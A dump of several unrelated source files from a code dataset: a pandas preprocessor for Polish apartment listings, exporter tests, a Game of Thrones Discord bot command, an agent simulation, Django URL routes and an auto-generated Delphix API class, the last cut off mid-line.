than 16000 characters check the language and get only polish description.\r\n create_table() -> pd.DataFrame:\r\n Create final preprocessing table.\r\n \"\"\"\r\n def __init__(self, apartment_details, information_types):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n apartment_details : PandasDataFrame\r\n name of apartments table.\r\n information_types : str\r\n columns of apartments table.\r\n \"\"\"\r\n self.apartment_details = apartment_details\r\n self.information_types = information_types\r\n\r\n def remove_quotation_marks(self) -> pd.DataFrame:\r\n \"\"\"Remove quotation marks from columns.\r\n Parameters\r\n ----------\r\n information_types: str\r\n names of columns from which quotation marks need to be removed.\r\n apartment_details : pd.DataFrame\r\n data frame with information about apartments.\r\n Returns\r\n ------\r\n apartment_details: pd.DataFrame\r\n data frame with information about apartments.\r\n \"\"\"\r\n information_types = self.information_types\r\n apartment_details = self.apartment_details\r\n for information_type in information_types:\r\n for index in range(len(apartment_details)):\r\n if type(apartment_details.loc[:, information_type][index])==list:\r\n apartment_details.loc[:, information_type][index] = 
list(filter(lambda x: x != \"\", apartment_details.loc[:, information_type][index]))\r\n try:\r\n apartment_details.loc[:, information_type][index] = ', '.join(apartment_details.loc[:, information_type][index])\r\n except:\r\n continue\r\n else:\r\n continue\r\n return apartment_details\r\n\r\n\r\n def numeric_information(self) -> pd.DataFrame:\r\n \"\"\"Convert numeric information to float.\r\n Parameters\r\n ----------\r\n information_types: str\r\n names of columns to try converting to float\r\n apartment_details: pd.DataFrame\r\n data frame with information about apartments.\r\n Returns\r\n ------\r\n apartment_details: pd.DataFrame\r\n data frame where numeric information type was changed to float.\r\n \"\"\"\r\n information_types = self.information_types\r\n apartment_details = self.remove_quotation_marks()\r\n for information_type in information_types:\r\n try:\r\n apartment_details.loc[:, information_type] = [float(apartment_details.loc[:, information_type][index]) for index in range(len(apartment_details))]\r\n except:\r\n continue\r\n return apartment_details\r\n\r\n\r\n def remove_new_line_marks(self) -> pd.DataFrame:\r\n \"\"\"Remove new line marks from columns.\r\n Parameters\r\n ----------\r\n information_types: str\r\n names of columns from which new line marks need to be removed.\r\n apartment_details: pd.DataFrame\r\n data frame with information about apartments.\r\n Returns\r\n ------\r\n apartment_details: pd.DataFrame\r\n data frame where new line marks were removed.\r\n \"\"\"\r\n information_types = self.information_types\r\n apartment_details = self.numeric_information()\r\n for information_type in information_types:\r\n for index in range(len(apartment_details)):\r\n try:\r\n apartment_details.loc[:, information_type][index] = apartment_details.loc[:, information_type][\r\n index].replace('\\n\\n', ', ').replace(', ,', ',').replace('\\\\xa0',' ')\r\n except:\r\n continue\r\n return apartment_details\r\n\r\n def prepare_table_information(self, table: pd.DataFrame) -> pd.DataFrame:\r\n \"\"\"Change table information from list to dictionary and create external table from it.\r\n Parameters\r\n ----------\r\n table: pd.DataFrame\r\n column with table information.\r\n Returns\r\n ------\r\n prepared_tables: pd.DataFrame\r\n data frame with table information.\r\n \"\"\"\r\n prepared_table = []\r\n params_table = pd.DataFrame()\r\n for index,row in enumerate(table):\r\n\r\n try:\r\n list_info = row.replace(\":\", \", \").replace(\" ,\",\"\").split(\", \")\r\n to_append = dict([x for x in zip(*[iter(list_info)]*2)])\r\n prepared_table.append(to_append)\r\n except:\r\n prepared_table.append(None)\r\n\r\n for i in range(len(prepared_table)):\r\n column = []\r\n row = []\r\n try:\r\n for key, value in prepared_table[i].items():\r\n column.append(key.strip(':'))\r\n row.append(value)\r\n except:\r\n row.append(None)\r\n df_temp = pd.DataFrame([row], columns=column)\r\n params_table = pd.concat([params_table, df_temp], ignore_index=True)\r\n\r\n return params_table.where(pd.notnull(params_table),None)\r\n\r\n def get_number(self, price_information: str) -> str:\r\n \"\"\"Get only numeric information of price from string.\r\n Parameters\r\n ----------\r\n price_information: str\r\n string with numeric and string price information.\r\n Returns\r\n ------\r\n price_number: str\r\n string with numeric price information.\r\n \"\"\"\r\n signs = [',','.']\r\n if price_information in signs:\r\n price_number = price_information\r\n else:\r\n price_number = str.isdigit(price_information)\r\n 
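# Note: get_number() is used as a filter() predicate in extract_price, so it receives one character at a time.\r\n 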
return price_number\r\n\r\n def extract_price(self, apartment_details_price_table: pd.DataFrame) -> pd.DataFrame:\r\n \"\"\"Extract price and currency from a string and convert price to float.\r\n Parameters\r\n ----------\r\n apartment_details_price_table: pd.DataFrame\r\n column with information about price.\r\n Returns\r\n ------\r\n apartment_details_price_table: pd.DataFrame\r\n data frame where price information type was changed to float.\r\n \"\"\"\r\n\r\n currency = []\r\n for i in range(len(apartment_details_price_table)):\r\n try:\r\n filtered_str = filter(self.get_number, ''.join(apartment_details_price_table[i]))\r\n only_digit = \"\".join(filtered_str)\r\n if only_digit == \"\" or only_digit == None:\r\n apartment_details_price_table[i] = None\r\n currency.append(None)\r\n else:\r\n currency.append(''.join(apartment_details_price_table[i]).split()[-1])\r\n apartment_details_price_table[i] = float(only_digit.replace(\",\", \".\"))\r\n except:\r\n apartment_details_price_table[i] = None\r\n currency.append(None)\r\n \r\n self.apartment_details['currency'] = currency\r\n return apartment_details_price_table\r\n\r\n def prepare_additional_info(self, apartment_details_add_info_table: pd.DataFrame, apartment_details_details_table: pd.DataFrame) -> pd.DataFrame:\r\n \"\"\"Join additional information and details to additional information.\r\n Parameters\r\n ----------\r\n apartment_details_add_info_table: pd.DataFrame\r\n column with additional information.\r\n apartment_details_details_table: pd.DataFrame\r\n column with details information.\r\n Returns\r\n ------\r\n apartment_details_add_info_table: pd.DataFrame\r\n data frame with additional information.\r\n \"\"\"\r\n for i in range(len(apartment_details_add_info_table)):\r\n try:\r\n apartment_details_add_info_table[i] += (', ' + apartment_details_details_table[i].replace(\":\",\": \"))\r\n except:\r\n continue\r\n return apartment_details_add_info_table\r\n\r\n def prepare_description_table(self, apartment_details_description_table: pd.DataFrame) -> pd.DataFrame:\r\n \"\"\"Split description of 4000 characters to several columns and if record has more than 16000 characters check the language and get only polish description.\r\n Parameters\r\n ----------\r\n apartment_details_description_table: pd.DataFrame\r\n column with description.\r\n Returns\r\n ------\r\n description_1: List\r\n list with tha first part of description.\r\n \"\"\"\r\n description_1 = []\r\n description_2 = []\r\n description_3 = []\r\n description_4 = []\r\n\r\n\r\n for i in range(len(apartment_details_description_table)):\r\n desc_list = [None, None, None, None]\r\n if apartment_details_description_table[i]==None:\r\n description_splitted = None\r\n elif len(apartment_details_description_table[i]) > 16000:\r\n description = apartment_details_description_table[i]\r\n text = ' '.join(description.replace(\",\",\"\").replace(\"-\",\"\").split(\" \")).split()\r\n elements = [text[x:x+6] for x in range(0, len(text),6)]\r\n\r\n pl = []\r\n for index, element in enumerate(elements):\r\n element = list(map(str.lower,element))\r\n try:\r\n language = detect(\" \".join(element))\r\n except:\r\n language = 'pl'\r\n if language =='pl':\r\n pl.append(\" \".join(element))\r\n\r\n description_splitted = wrap(\" \".join(pl), 4000)\r\n\r\n else:\r\n try:\r\n description_splitted = wrap(apartment_details_description_table[i], 4000)\r\n except:\r\n description_splitted = wrap(''.join(apartment_details_description_table[i]), 4000)\r\n\r\n\r\n try:\r\n for element in 
range(len(description_splitted)):\r\n desc_list[element] = description_splitted[element]\r\n except:\r\n # desc_list entries already default to None for missing pieces\r\n pass\r\n\r\n description_1.append(desc_list[0])\r\n description_2.append(desc_list[1])\r\n description_3.append(desc_list[2])\r\n description_4.append(desc_list[3])\r\n\r\n self.apartment_details['description_2'] = description_2\r\n self.apartment_details['description_3'] = description_3\r\n self.apartment_details['description_4'] = description_4\r\n\r\n return description_1\r\n\r\n def create_table(self):\r\n \"\"\"Create final preprocessing table.\r\n Returns\r\n ------\r\n otodom_table: pd.DataFrame\r\n final preprocessing table with None instead of empty strings.\r\n \"\"\"\r\n otodom_table = pd.DataFrame()\r\n params_tables_otodom = self.prepare_table_information(table=self.remove_new_line_marks()['details'])\r\n otodom_table['area'] = self.apartment_details['Area']\r\n otodom_table['latitude'] = self.apartment_details['lat']\r\n otodom_table['longitude'] = self.apartment_details['lng']\r\n otodom_table['link'] = self.apartment_details['link']\r\n otodom_table['price'] = self.extract_price(self.apartment_details['price'])\r\n otodom_table['currency'] = self.apartment_details['currency']\r\n try:\r\n otodom_table['rooms'] = params_tables_otodom['Liczba pokoi']\r\n except:\r\n otodom_table['rooms'] = None\r\n try:\r\n otodom_table['floors_number'] = params_tables_otodom['Liczba pięter']\r\n except:\r\n otodom_table['floors_number'] = None\r\n try:\r\n otodom_table['floor'] = params_tables_otodom['Piętro']\r\n except:\r\n otodom_table['floor'] = None\r\n try:\r\n otodom_table['type_building'] = params_tables_otodom['Rodzaj zabudowy'].str.lower()\r\n except:\r\n otodom_table['type_building']=None\r\n try:\r\n otodom_table['material_building'] = params_tables_otodom['Materiał budynku'].str.lower()\r\n except:\r\n otodom_table['material_building'] = None\r\n try:\r\n otodom_table['year'] = params_tables_otodom['Rok budowy']\r\n except:\r\n otodom_table['year'] = None\r\n otodom_table['headers'] = self.apartment_details['additional_info_headers']\r\n otodom_table['additional_info'] = self.prepare_additional_info(apartment_details_add_info_table=self.apartment_details['additional_info'], apartment_details_details_table = self.apartment_details['details'])\r\n otodom_table['city'] = self.apartment_details['city']\r\n otodom_table['address'] = self.apartment_details['address']\r\n otodom_table['district'] = self.apartment_details['district']\r\n otodom_table['voivodeship'] = self.apartment_details['voivodeship']\r\n otodom_table['active'] = 'Yes'\r\n otodom_table['scrape_date'] = str(datetime.now().date())\r\n otodom_table['inactive_date'] = '-'\r\n otodom_table['page_name'] = 'Otodom'\r\n otodom_table['offer_title'] = self.apartment_details['title']\r\n otodom_table['description_1'] = self.prepare_description_table(self.apartment_details['description'])\r\n otodom_table['description_2'] = self.apartment_details['description_2']\r\n otodom_table['description_3'] = self.apartment_details['description_3']\r\n otodom_table['description_4'] = self.apartment_details['description_4']\r\n return otodom_table.replace({\"\": None})\r\n\r\nif __name__ == \"__main__\":\r\n otodom_preprocess = Preprocessing_Otodom(apartment_details=apartments.where(pd.notnull(apartments),None), information_types=apartments.columns)\r\n\r\n start_time = datetime.now()\r\n otodom_table = otodom_preprocess.create_table()\r\n end_time = datetime.now()\r\n print('Duration: {}'.format(end_time - 
start_time))\r\n\r\n","sub_path":"Preprocessing_scripts/otodom.py","file_name":"otodom.py","file_ext":"py","file_size_in_byte":15496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"54121393","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nA couple of tests for the Exporter class and subclasses\n\"\"\"\n\nfrom spectraplotpy import Exporter\nfrom spectraplotpy import BaseTextExporter\nfrom spectraplotpy import CSVExporter\nfrom spectraplotpy import AvivExporter\n#from spectraplotpy import GraphicExporter\n\nfrom spectraplotpy import Dataset\n\ndef test_construction():\n \"\"\"Test the constructor of the class Exporter\"\"\"\n assert Exporter([])\n\ndef test_txt_construction():\n \"\"\"Test construction of the class BaseTextExporter\"\"\"\n assert BaseTextExporter([])\n\ndef test_default_function():\n \"\"\"Test for basic functionality\"\"\"\n ds = Dataset()\n bte = BaseTextExporter(ds)\n \n with open('.testfile.txt', 'w') as f:\n assert bte.write(f) is None\n\n assert bte.text()\n assert bte.save('.testfile.txt') is None\n\ndef test_aviv_exporter():\n \"\"\"Test for specific functionality of the AvivExporter\"\"\"\n ds = Dataset(x=[1, 2, 3], y=[1, 2, 3],\n metadata={'temp': 10, 'date': 'today'})\n ave = AvivExporter(ds)\n \n with open('.testfile.cd', 'w') as f:\n assert ave.write(f) is None\n\n assert ave.text()\n assert ave.save('.testfile.cd') is None\n\n\ndef test_csv_construction():\n ds = Dataset()\n assert CSVExporter(ds)\n\n\n\n\n","sub_path":"test/test_exporter.py","file_name":"test_exporter.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"314863374","text":"import anapioficeandfire\r\nimport discord\r\nimport STATICS\r\nfrom commands import cmd_gify\r\nimport configparser\r\nimport random\r\n\r\napi = anapioficeandfire.API()\r\n\r\nconfig = configparser.ConfigParser()\r\nconfig.read(\"SAVES/got_aliases.ini\")\r\n\r\n#aliases_houses = {}\r\n#\r\n#try:\r\n# for i in range(426, 450):\r\n# alias = api.get_house(id=i).name\r\n# if alias.startswith(\"House\"):\r\n# alias_splitted = alias.split(\" \")[1:]\r\n# alias = str(alias_splitted)[2:][:-2].replace(\",\", \"\").replace(\"'\", \"\")\r\n# if alias.__contains__(\" of \"):\r\n# alias = alias.split(\" of \")[0]\r\n# try:\r\n# aliases_houses[alias] = aliases_houses[alias] + \";\" + str(i)\r\n# except:\r\n# aliases_houses[alias] = str(i)\r\n# print(alias + \" : \" + aliases_houses[alias])\r\n#except:\r\n# print(\"error\")\r\n#config['Houses'] = aliases_houses\r\n#with open('../SAVES/got_aliases.ini', 'w') as configfile:\r\n# config.write(configfile)\r\n\r\nasync def executor(cmd, args, client, msg):\r\n try:\r\n if len(args) == 0 or len(args) == 1:\r\n await help(client, msg)\r\n return True\r\n embed = discord.Embed(\r\n title=\"<:null:397485751358455808>\",\r\n color=0x2ecc71,\r\n description=\" \"\r\n )\r\n embed.set_author(\r\n name=\"GAME OF THRONES\"\r\n )\r\n embed.set_footer(\r\n text=\"Hodor version \" + STATICS.version,\r\n icon_url=client.user.avatar_url\r\n )\r\n sended_msg = await client.send_message(msg.channel, \"Loading Data ... 
:inbox_tray:\")\r\n search_arg = \"\"\r\n for i in range(1, len(args)):\r\n search_arg += args[i] + \" \"\r\n if args[0] == \"character\":\r\n await get_character(search_arg, embed, client, sended_msg)\r\n elif args[0] == \"house\":\r\n await get_house(search_arg, embed, client, sended_msg)\r\n else:\r\n await help(client, msg)\r\n client.delete_message(sended_msg)\r\n return True\r\n return True\r\n except Exception as e:\r\n return e\r\n\r\n#----------------------------------------------Character--------------------------------------------------\r\nasync def get_character(name, embed, client, sended_msg):\r\n print(name)\r\n characters = api.get_characters(name=name)\r\n if len(characters) == 0:\r\n embed.add_field(\r\n name=\"No Character found with the name:\",\r\n value=str(name),\r\n )\r\n await client.edit_message(sended_msg, \" \", embed=embed)\r\n if len(characters) == 2:\r\n list = \"\"\r\n for i in range(len(characters)):\r\n list += characters[i].name + \"\\n\"\r\n embed.add_field(\r\n name=\"Found %s Characters:\" % str(len(characters)),\r\n value=list,\r\n inline=False\r\n )\r\n if len(characters) == 1:\r\n character = characters[0]\r\n print(\"Found one Character \" + character.name)\r\n\r\n embed.set_author(\r\n name=character.name.upper()\r\n )\r\n\r\n if not character.name == \"\":\r\n embed.add_field(\r\n name=\"Name:\",\r\n value=str(character.name),\r\n )\r\n\r\n if not character.gender == \"\":\r\n embed.add_field(\r\n name=\"Gender:\",\r\n value=str(character.gender),\r\n )\r\n\r\n if not character.father == \"\":\r\n father = character.father\r\n if father.startswith(\"http\"):\r\n id = father.split(\"/\")[-1]\r\n father = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"Father:\",\r\n value=father,\r\n )\r\n\r\n if not character.mother == \"\":\r\n mother = character.mother\r\n if mother.startswith(\"http\"):\r\n id = mother.split(\"/\")[-1]\r\n mother = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"Mother:\",\r\n value=mother,\r\n )\r\n\r\n if not character.spouse == \"\":\r\n spouse = character.spouse\r\n if spouse.startswith(\"http\"):\r\n id = spouse.split(\"/\")[-1]\r\n spouse = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"Spouse:\",\r\n value=spouse,\r\n )\r\n\r\n if not character.culture == \"\":\r\n embed.add_field(\r\n name=\"Culture:\",\r\n value=str(character.culture),\r\n )\r\n\r\n if not character.born == \"\":\r\n embed.add_field(\r\n name=\"Born:\",\r\n value=str(character.born),\r\n )\r\n\r\n if not character.died == \"\":\r\n embed.add_field(\r\n name=\"Died:\",\r\n value=str(character.died),\r\n )\r\n\r\n actors = \"\"\r\n for actor in character.playedBy:\r\n actors += actor + \"\\n\"\r\n if not actors == \"\":\r\n embed.add_field(\r\n name=\"Played By:\",\r\n value=actors,\r\n )\r\n\r\n titles = \"\"\r\n for title in character.titles:\r\n titles += title + \"\\n\"\r\n if not titles == \"\":\r\n embed.add_field(\r\n name=\"Titles:\",\r\n value=titles,\r\n )\r\n\r\n aliases = \"\"\r\n for alias in character.aliases:\r\n aliases += alias + \"\\n\"\r\n if not aliases == \"\":\r\n embed.add_field(\r\n name=\"Aliases:\",\r\n value=aliases,\r\n )\r\n\r\n allegiances = \"\"\r\n for allegiance in character.allegiances:\r\n if allegiance.startswith(\"http\"):\r\n id = allegiance.split(\"/\")[-1]\r\n allegiances += api.get_house(id=id).name + \"\\n\"\r\n else:\r\n allegiances += allegiance + \"\\n\"\r\n if not allegiances == \"\":\r\n embed.add_field(\r\n name=\"Allegiances:\",\r\n value=allegiances,\r\n )\r\n 
books = \"\"\r\n\r\n for book in character.povBooks:\r\n if book.startswith(\"http\"):\r\n id = book.split(\"/\")[-1]\r\n books += api.get_book(id=id).name + \"\\n\"\r\n else:\r\n books += book + \"\\n\"\r\n if not books == \"\":\r\n embed.add_field(\r\n name=\"Books:\",\r\n value=books,\r\n )\r\n\r\n seasons = \"\"\r\n for season in character.tvSeries:\r\n seasons += season + \"\\n\"\r\n if not seasons == \"\":\r\n embed.add_field(\r\n name=\"Series:\",\r\n value=seasons,\r\n )\r\n\r\n embed.add_field(\r\n name=\"<:null:397485751358455808>\",\r\n value=\"More Informations: http://awoiaf.westeros.org/index.php/\" + character.name.replace(\" \", \"_\")\r\n )\r\n\r\n embed.set_image(url=cmd_gify.get_gif_url(character.name))\r\n\r\n await client.edit_message(sended_msg, \" \", embed=embed)\r\n\r\n\r\n#-------------------------------------------------------------House----------------------------------------------------------------\r\nasync def get_house(name, embed, client, sended_msg):\r\n ids=None\r\n houses=None\r\n try:\r\n if not name.lower().__contains__(\"of\"):\r\n alias = name.lower()\r\n if alias.startswith(\"house \"):\r\n alias = alias.split(\" \")[1]\r\n config_get = config['Houses'][alias.replace(\" \", \"\")]\r\n ids = config_get.split(\";\")\r\n print(\"Found alias \" + alias + \" : \" + str(ids))\r\n if len(ids) == 1:\r\n houses = api.get_houses(name=api.get_house(id=ids[0]).name)\r\n else:\r\n houses = []\r\n for id in ids:\r\n houses.append(api.get_house(id=id))\r\n else:\r\n i = \"1\"+1\r\n except:\r\n print(\"Dont found in aliases ...\")\r\n try:\r\n if name.lower().startswith(\"house \"):\r\n houses = api.get_houses(name=name)\r\n else:\r\n houses = api.get_houses(name=\"House \" + name)\r\n except:\r\n print(\"Dont found\")\r\n embed.add_field(\r\n name=\"No House found with the name:\",\r\n value=str(name),\r\n )\r\n await client.edit_message(sended_msg, \" \", embed=embed)\r\n\r\n if len(houses) == 0:\r\n embed.add_field(\r\n name=\"No House found with the name:\",\r\n value=str(name),\r\n )\r\n await client.edit_message(sended_msg, \" \", embed=embed)\r\n if len(houses) >= 2:\r\n list = \"\"\r\n for i in range(len(houses)):\r\n list += houses[i].name + \"\\n\"\r\n embed.add_field(\r\n name=\"Found %s Houses:\" % str(len(houses)),\r\n value=list,\r\n inline=False\r\n )\r\n if len(houses) == 1:\r\n house = houses[0]\r\n\r\n embed.set_author(\r\n name=house.name.upper()\r\n )\r\n\r\n if not house.name == \"\":\r\n embed.add_field(\r\n name=\"Name:\",\r\n value=str(house.name),\r\n )\r\n\r\n if not house.region == \"\":\r\n embed.add_field(\r\n name=\"Region:\",\r\n value=str(house.region),\r\n )\r\n\r\n if not house.currentLord == \"\":\r\n lord = house.currentLord\r\n if lord.startswith(\"http\"):\r\n id = lord.split(\"/\")[-1]\r\n lord = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"Lord:\",\r\n value=lord,\r\n )\r\n\r\n if not house.overlord == \"\":\r\n overlord = house.overlord\r\n if overlord.startswith(\"http\"):\r\n id = overlord.split(\"/\")[-1]\r\n overlord = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"OverLord:\",\r\n value=overlord,\r\n )\r\n\r\n if not house.heir == \"\":\r\n heir = house.heir\r\n if heir.startswith(\"http\"):\r\n id = heir.split(\"/\")[-1]\r\n heir = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"Heir:\",\r\n value=heir,\r\n )\r\n\r\n if not house.founded == \"\":\r\n embed.add_field(\r\n name=\"Founded:\",\r\n value=str(house.founded),\r\n )\r\n\r\n if not house.founder == \"\":\r\n founder 
= house.founder\r\n if founder.startswith(\"http\"):\r\n id = founder.split(\"/\")[-1]\r\n founder = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"Founder:\",\r\n value=founder,\r\n )\r\n\r\n if not house.coatOfArms == \"\":\r\n embed.add_field(\r\n name=\"Coat Of Arms:\",\r\n value=str(house.coatOfArms),\r\n )\r\n\r\n if not house.words == \"\":\r\n embed.add_field(\r\n name=\"Words:\",\r\n value=str(house.words),\r\n )\r\n\r\n seats = \"\"\r\n for seat in house.seats:\r\n seats += seat + \"\\n\"\r\n if not seats == \"\":\r\n embed.add_field(\r\n name=\"Seats:\",\r\n value=seats,\r\n )\r\n\r\n titles = \"\"\r\n for title in house.titles:\r\n titles += title + \"\\n\"\r\n if not titles == \"\":\r\n embed.add_field(\r\n name=\"Titles:\",\r\n value=titles,\r\n )\r\n\r\n if not house.diedOut == \"\":\r\n embed.add_field(\r\n name=\"Died Out:\",\r\n value=str(house.diedOut),\r\n )\r\n\r\n cadetbranches = \"\"\r\n for cadetbranch in house.cadetBranches:\r\n if cadetbranch.startswith(\"http\"):\r\n id = cadetbranch.split(\"/\")[-1]\r\n cadetbranches += api.get_house(id=id).name + \"\\n\"\r\n else:\r\n cadetbranches += cadetbranch + \"\\n\"\r\n if not cadetbranches == \"\":\r\n embed.add_field(\r\n name=\"Cadet Branches:\",\r\n value=cadetbranches,\r\n )\r\n\r\n embed.add_field(\r\n name=\"<:null:397485751358455808>\",\r\n value=\"More Informations: http://awoiaf.westeros.org/index.php/\" + house.name.split(\" of \")[0].replace(\" \", \"_\")\r\n )\r\n await client.add_reaction(sended_msg, \"🙏\")\r\n\r\n #embed.set_image(url=cmd_gify.get_gif_url(house.name))\r\n await client.edit_message(sended_msg, \" \", embed=embed)\r\n\r\n\r\nasync def help(client, msg):\r\n embed = discord.Embed(\r\n title=\"<:null:397485751358455808>\",\r\n color=0x2ecc71,\r\n description=\"\\n\"\r\n \"\"\r\n )\r\n embed.add_field(\r\n name=\"Commands:\",\r\n value=\"got house [name]\\n<:null:397485751358455808>\\n\"\r\n \"got character [name]\",\r\n )\r\n embed.add_field(\r\n name=\"Description:\",\r\n value=\"Shows informations\\nabout a House in GoT\\n\"\r\n \"Shows informations\\nabout a Character in GoT\",\r\n )\r\n embed.set_footer(\r\n text=\"Hodor version %s\" % STATICS.version,\r\n icon_url=client.user.avatar_url\r\n )\r\n embed.set_thumbnail(\r\n url=\"https://emojipedia-us.s3.amazonaws.com/thumbs/160/google/110/scroll_1f4dc.png\"\r\n )\r\n embed.set_author(\r\n name=\"HELP\"\r\n )\r\n\r\n await client.send_message(msg.channel, embed=embed)\r\n\r\n\r\nasync def send_sworn_private(house, client, user):\r\n house = api.get_houses(name=house)[0]\r\n print(\"Loading Sworns for \" + house.name + \" | Requested by \" + user.name)\r\n embed = discord.Embed(\r\n title=\"<:null:397485751358455808>\",\r\n color=0x2ecc71,\r\n description=\" \"\r\n )\r\n\r\n sworns = \"\"\r\n n = 0\r\n if len(house.swornMembers) > 20:\r\n n = 20\r\n else:\r\n n = len(house.swornMembers)\r\n for i in range(1, n):\r\n sworn = random.choice(house.swornMembers)\r\n if sworns.__contains__(sworn):\r\n sworn = random.choice(house.swornMembers)\r\n if sworn.startswith(\"http\"):\r\n try:\r\n id = sworn.split(\"/\")[-1]\r\n sworns += api.get_character(id=id).name + \", \"\r\n except:\r\n i = 0\r\n else:\r\n sworns += sworn + \"\\n\"\r\n if not sworns == \"\":\r\n embed.add_field(\r\n name=\"%s of the Sworn Members:\" % str(n),\r\n value=sworns,\r\n )\r\n\r\n embed.set_footer(\r\n text=\"Hodor version %s\" % STATICS.version,\r\n icon_url=client.user.avatar_url\r\n )\r\n\r\n embed.set_author(\r\n name=house.name.upper()\r\n )\r\n\r\n 
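# Deliver the sworn-members embed as a direct message to the requesting user.\r\n 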
await client.send_message(user, embed=embed)\r\n","sub_path":"commands/got_old.py","file_name":"got_old.py","file_ext":"py","file_size_in_byte":14747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"546022609","text":"from AgentState import AgentState\nfrom random import randint\n\nclass Agent:\n\tdef __init__(self,id, vertex):\n\t\tself.id = id\n\t\tself.state = AgentState()\n\t\tself.location = vertex\n\n\tdef get_coords_from_movement(self,direction, row, col):\n\t\tif direction == \"L\":\n\t\t\treturn row, col-1\n\t\telif direction == \"R\":\n\t\t\treturn row, col+1\n\t\telif direction == \"U\":\n\t\t\treturn row-1, col\n\t\telif direction == \"D\":\n\t\t\treturn row+1, col\n\t\telse:\n\t\t\treturn row, col\n\n\tdef transition(self,nearby_agents):\n\t\t# Depends on the application\n\t\tdirection_map = {0:\"S\", 1:\"L\", 2:\"R\", 3:\"U\", 4:\"D\"}\n\n\t\t# Try to cluster\n\t\tif len(nearby_agents) == 0:\n\t\t\treturn self.state, \"S\"\n\n\t\ttotal_dist = 0\n\t\tfor agent in nearby_agents:\n\t\t\ttotal_dist += abs(self.location.row-agent.location.row)\n\t\t\ttotal_dist += abs(self.location.col-agent.location.col)\n\n\t\tbest_move = \"S\"\n\t\tbest_distance = 0\n\n\t\tfor direction in direction_map.values():\n\t\t\tnew_loc = self.get_coords_from_movement(direction, self.location.row, self.location.col)\n\n\t\t\tdist = 0\n\t\t\tfor agent in nearby_agents:\n\t\t\t\tdist += abs(new_loc[0]-agent.location.row)+abs(new_loc[1]-agent.location.col)\n\t\t\tif dist > best_distance:\n\t\t\t\tbest_distance = dist\n\t\t\t\tbest_move = direction\n\t\treturn self.state, best_move\n\n\t\t# Random direction movement\n\t\t# return self.state, direction[randint(0,4)] \n\n\n","sub_path":"Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"66124952","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = patterns('', \n url(r'^ator/(?P<slug>[\\w-]+)/$', 'catalogo.views.ator'),\n url(r'^filme/(?P<slug>[\\w-]+)/$', 'catalogo.views.filme'),\n (r'^grappelli/', include('grappelli.urls')),\n (r'^admin/', include(admin.site.urls)),\n)\n\n#Serve os arquivos enviados \nif settings.DEBUG:\n urlpatterns += patterns('',\n (r'^media/(?P<path>.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT}))\n\n#Essas regras precisam ficar apos os arquivos enviados\nurlpatterns += patterns('',\n url(r'^(?P<genero>\\w+)', 'catalogo.views.genero'),\n url(r'^$', 'catalogo.views.index', name='index'))","sub_path":"src/desafio_storm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"461675064","text":"#\n# Copyright 2017 by Delphix\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n#\n# This class has been 
automatically generated from:\n# /delphix-js-data-layout-create-parameters.json\n#\n# Do not edit this file manually!\n#\n\nfrom delphixpy.v1_9_0.web.vo.TypedObject import TypedObject\nfrom delphixpy.v1_9_0 import factory\nfrom delphixpy.v1_9_0 import common\n\nclass __Undef(object):\n def __repr__(self):\n return \"undef\"\n\n_UNDEFINED = __Undef()\n\nclass JSDataLayoutCreateParameters(TypedObject):\n \"\"\"\n *(extends* :py:class:`v1_9_0.web.vo.TypedObject` *)* The parameters used to\n create a data layout.\n \"\"\"\n def __init__(self, undef_enabled=True):\n super(JSDataLayoutCreateParameters, self).__init__()\n self._type = (\"JSDataLayoutCreateParameters\", True)\n self._data_sources = (self.__undef__, True)\n self._notes = (self.__undef__, True)\n self._properties = (self.__undef__, True)\n self._name = (self.__undef__, True)\n\n API_VERSION = \"1.9.0\"\n\n @classmethod\n def from_dict(cls, data, dirty=False, undef_enabled=True):\n obj = super(JSDataLayoutCreateParameters, cls).from_dict(data, dirty, undef_enabled)\n if \"dataSources\" not in data:\n raise ValueError(\"Missing required property \\\"dataSources\\\".\")\n obj._data_sources = []\n for item in data.get(\"dataSources\") or []:\n obj._data_sources.append(factory.create_object(item))\n factory.validate_type(obj._data_sources[-1], \"JSDataSourceCreateParameters\")\n obj._data_sources = (obj._data_sources, dirty)\n obj._notes = (data.get(\"notes\", obj.__undef__), dirty)\n if obj._notes[0] is not None and obj._notes[0] is not obj.__undef__:\n assert isinstance(obj._notes[0], basestring), (\"Expected one of [u'string'], but got %s\" % type(obj._notes[0]))\n common.validate_format(obj._notes[0], \"None\", None, 4096)\n obj._properties = (data.get(\"properties\", obj.__undef__), dirty)\n if obj._properties[0] is not None and obj._properties[0] is not obj.__undef__:\n assert isinstance(obj._properties[0], dict), (\"Expected one of [u'object'], but got %s\" % type(obj._properties[0]))\n common.validate_format(obj._properties[0], \"None\", None, None)\n if \"name\" not in data:\n raise ValueError(\"Missing required property \\\"name\\\".\")\n obj._name = (data.get(\"name\", obj.__undef__), dirty)\n if obj._name[0] is not None and obj._name[0] is not obj.__undef__:\n assert 